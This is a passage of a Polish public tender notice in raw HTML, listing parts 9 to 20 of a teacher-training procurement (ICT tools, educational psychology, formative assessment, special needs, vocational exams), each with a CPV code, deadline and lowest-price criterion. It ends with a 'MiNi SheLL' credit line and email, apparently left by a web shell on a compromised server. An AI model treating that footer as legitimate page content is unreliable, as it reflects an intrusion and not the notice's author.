Skuteczne występowanie o środki unijne dla szkoły 
Kryteria dobrego projektu 
Konstruowanie dobrego projektu np. w ramach zagranicznej  współpracy szkół,
Pozyskiwanie wsparcia ekspertów, 
Nawiązanie realnej współpracy ze szkołami zagranicznymi  w celu wymiany młodzieży 
- 4 godz.  x 1  grupa    ogółem 4 godziny dydaktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Szkolenie pn. Nowe rozwiązania, technologie, programy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nowoczesna technologia w warsztacie pracy nauczyciela, 
Ciekawe narzędzia i programy na zajęciach, np. tworzenie podcastów, filmów wideo,  
 Moodle, Program Stop Motion Animation - informacyjnie
Praca w chmurze, prezentacje w Prezi - ćwiczenia
Kreatywne nauczanie z wykorzystaniem TIK - przykłady
Skuteczne wykorzystanie nowoczesnych technologii
Szkolenie w pracowni komputerowej. Praca ćwiczeniowa. Materiały ćwiczeniowe.
- 4 godz x 1 grupa ogółem 4 godz. dydaktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Szkolenie pn. Psychologia pomaga w dobrym kształceniu i wychowaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka modeli osobowości z wyróżnieniem wielkiej piątki
Perspektywy postrzegania czasu wg Zimbardo - testy ZTPI, interpretacje, stosowanie w diagnostyce edukacyjnej
Psychologia nastawień Carol Dweck i jej rola w edukacji - testy, interpretacje, praktyczny trening zmiany nastawienia
Rola planowania w efektywnym uczeniu się - diagnoza i sposoby postępowania wg Zimbardo i Carol Dweck
- 5 godz.  x 1 grupa    ogółem 5 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Szkolenie pn. Dialog interdyscyplinarny w kształceniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Behawioryzm i konstruktywizm w kształceniu
Wpływ psychologii poznawczej na stosowane strategie kształcenia
Komplementarność wiedzy wyjaśniającej i interpretacyjnej w edukacji
Dialog interdyscyplinarny w pokoju nauczycielskim - budowanie trzeciej kultury
Diagnostyka edukacyjna - metody wspólne i zróżnicowane w zależności od dyscypliny wiedzy
Kształcenie kontekstowe - praktyczne przykłady i heurystyki działań edukacyjnych 
Kształcenie kontekstowe- wypracowywanie w grupach i analiza planów scenariuszy lekcyjnych 5 godz x 1 grupa Ogółem 5 godz. dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Szkolenie pn.  Twórczość w edukacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Psychometryczne i poznawcze teorie inteligencji 
Nauczycielska diagnoza uczniów ponadprzeciętnie zdolnych
Teorie elitarne i egalitarne twórczości
Związek twórczości z uzdolnieniami i cechami osobowości
Dostosowanie metod edukacyjnych do możliwości ucznia
Kompetencje nauczyciela w rozwijaniu uzdolnień twórczych ucznia
 - 4 godz.  x 1 grupa    ogółem 4 godziny dydaktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Szkolenie pn. Współczesne metody dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak pomóc uczniowi uczyć się
Tworzenie map myśli.
Kształtowanie umiejętności komunikacji interpersonalnej.
Inteligencje wielorakie w praktyce szkolnej.
Inteligencja emocjonalna.
Uczenie polisensorczne.
Doskonalenie umiejętności pracy zespołowej
Metody waloryzacyjne (eksponujące wartości)
Metody samodzielnego dochodzenia do wiedzy
Metody aktywne
- 5 godz.  x 1 grupa    ogółem 5 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Szkolenie pn .Zachowania niepożądane  -  jak sobie z nimi radzić.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Praca z uczniem z ADHD - symptomy, diagnoza, sposoby postępowania
Zespół Aspergera -symptomy, sposoby postepowania w szkole
Uczeń z zachowania mi opozycyjno-buntowniczymi-opracowanie strategii postępowania
Konflikt rówieśniczy - sposoby rozwiazywania, mediacja rówieśnicza
- 4 godz.  x 2 grupa    ogółem 8 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Szkolenie pn. Ocenianie kształtujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ocenianie kształtujące - nowa filozofia oceniania.
Planowanie pracy w ocenianiu kształtującym.
Wspieranie rozwoju ucznia i  uczenia się poprzez ocenianie kształtujące
Znaczenie pytań kluczowych  i nacobezu w nauczaniu (techniki zadawania pytań).
Motywująca rola informacji zwrotnej.
Różnice między ocenianiem kształtującym a sumującym
Korzyści z wykorzystania oceniania kształtującego w pracy nauczyciela.
- 5 godz.  x 1 grupa    ogółem 5 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Szkolenie pn Uczeń ze specjalnymi potrzebami edukacyjnymi i specyfika jego funkcjonowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diagnoza potrzeb uczniów - wczesne rozpoznanie
Dostosowanie metod, form i wymagań edukacyjnych do ich możliwości
Opinie i orzeczenia PPP - planowanie pracy korekcyjnej
Kompetencje nauczyciela
Wielospecjalistyczna ocena poziomu funkcjonowania ucznia jako narzędzie 
  - 4 godz.  x 1 grupa    ogółem 4 godziny dydaktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Szkolenie pn. Tworzenie adaptacja programów nauczania dla zawodu dostosowanych do specyfiki szkoły, potrzeb uczniów i rynku pracy ze szczególnym uwzględnieniem korelacji przedmiotów zawodowych i ogólnokształcących oraz monitorowania realizacji podstawy programowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> program nauczania dla zawodu w świetle prawa, metodyki konstruowania programów nauczania i dokumentów szkolnych (Szkolny Plan Nauczania),
projektowanie programu nauczania z uwzględnieniem specyfiki szkoły i potrzeb uczniów,
planowanie korelacji przedmiotów zawodowych z nauczaniem ogólnokształcącym,
planowanie ewaluacji programu nauczania dla zawodu,
monitorowanie realizacji podstawy programowej.
5 godz.  x 1 grupa    ogółem 5 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Szkolenie pn. Nowa formuła egzaminów zawodowych potwierdzających kwalifikacje w zawodzie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aspekty formalno - prawne nowego egzaminu zawodowego,
potwierdzanie nowych kwalifikacji i zdobywanie nowych zawodów - planowanie ścieżki kształcenia w kontekście uczenia się przez całe życie LLL,
struktura, formy, przebieg nowego egzaminu zawodowego,
analiza zadania praktycznego dla wybranych umiejętności z danej kwalifikacji,
przygotowanie uczniów do egzaminu zawodowego.
4 godz.  x 1 grupa    ogółem 4 godziny dydaktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Szkolenie pn. Kompetencje nauczyciela zapewniające wysoki poziom realizacji kształcenia zawodowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> nauczyciel jako promotor indywidualnego sukcesu swoich wychowanków: sposoby i metody rozwijania sił twórczych i zdolności innowacyjnej uczniów,
nauczyciel jako organizator środowiska uczenia się swoich wychowanków: metody kształtowania u uczniów wiedzy zawodowej, umiejętności praktycznych oraz umiejętności personalno - społecznych,
nauczyciel jako przewodnik przygotowujący swoich uczniów do dalszego kształcenia i pracy zawodowej: sposoby i metody kształtowania umiejętności uczenia się, planowania ścieżki kształcenia równoległego (w kontekście idei uczenia się przez całe życie LLL) i kariery zawodowej (w kontekście zdobywania nowych zawodów),
nauczyciel jako osoba poznająca uczniów i ich środowisko: sposoby diagnozowania cech rozwojowych i indywidualnych uczniów i ich środowiska społeczno - wychowawczego (w kontekście indywidualizacji procesu kształcenia),
nauczyciel jako sprawny uczestnik procesu komunikacji: komunikacja z uczniami, rodzicami i innymi nauczycielami.
5 godz.  x 1 grupa    ogółem 5 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Szkolenie pn. Kwalifikacyjne kursy zawodowe KKZ jako poszerzenie oferty dydaktycznej placówki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aspekty formalno - prawne prowadzenia KKZ,
indywidualne ścieżki kształcenia i kariery - diagnoza kompetencji uczestników,
opracowanie planów i programów KKZ ,
przygotowanie metodyczne nauczycieli do prowadzenia KKZ - specyfika uczenia się dorosłych.
4 godz.  x 1 grupa    ogółem 4 godziny dydaktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com